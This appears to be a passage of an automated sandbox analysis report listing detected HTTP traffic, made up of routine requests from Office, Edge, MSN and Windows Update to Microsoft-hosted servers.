              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=02AF36CE75CE647F00F523F374AC6592&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=4b2ab08e59af414bcdab22dfa67240ef HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=02AF36CE75CE647F00F523F374AC6592; _EDGE_S=F=1&SID=14C32D7CE61E6B5920983841E71A6A76; _EDGE_V=1; _C_ETH=1; msnup=
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyO5.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1732751372&P2=404&P3=2&P4=Gj2rnMI4FwnLoclpushBmbTRr64moPmT2PDMZwaZfWoSyaUOglcV8V5p0GE7RmNrwNrOdNPs%2fXuh4t7Cf27Hmw%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: PJ7BWrT32cUjzmwscWiumNSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Ts2XnfxeuFhKo77&MD=WfzzbFec HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
